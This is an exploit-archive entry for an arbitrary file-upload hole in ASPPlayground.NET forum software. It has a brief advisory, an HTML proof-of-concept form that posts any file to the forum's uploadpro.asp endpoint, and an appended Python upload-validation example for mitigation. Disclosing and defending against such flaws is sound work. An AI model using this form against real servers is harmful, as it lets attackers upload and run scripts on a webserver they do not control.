64 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly execute the scripts on the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver.

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?
memori=&deletefile=&mode=" enctype="multipart/form-data"
onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"
cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>
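
Mitigation sketch for the upload issue described above. This is an added example, not ASPPlayground.NET code and not part of the original advisory. It shows the server-side checks an upload handler needs so that an uploaded file cannot be stored as an executable script. The image-only allowlist, the function names and the sample inputs are assumptions made for illustration.

```python
import re
import secrets

# Assumption: the forum only needs image attachments; adjust to local policy.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Leading bytes each allowed type must start with.
_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# Exactly one base name, one dot, one extension. Anything else (extra dots,
# separators, semicolons, colons, NUL bytes, trailing dots or spaces) fails.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def validate_upload_name(client_name):
    """Return the lowercase extension if the client file name is acceptable, else None."""
    # Some browsers send a full client-side path; only the last component matters.
    leaf = re.split(r"[\\/]", client_name)[-1]
    match = _SAFE_NAME.fullmatch(leaf)
    if not match:
        return None
    ext = match.group(1).lower()
    return ext if ext in ALLOWED_EXTENSIONS else None


def stored_name_for(client_name, data):
    """Return a server-generated file name for an accepted upload, else None."""
    ext = validate_upload_name(client_name)
    if ext is None or not data.startswith(_MAGIC[ext]):
        return None
    # The client-supplied name is never used on disk. Store the file in a
    # directory where the web server has script execution disabled.
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample inputs, not taken from a real request.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, body in [("cat.PNG", png), ("page.asp", b"<% %>"), ("cat.png", b"<% %>")]:
        print(name, "->", stored_name_for(name, body))
```

The extension and content checks are a second line of defence; the upload endpoint itself should also require an authenticated session with permission to attach files.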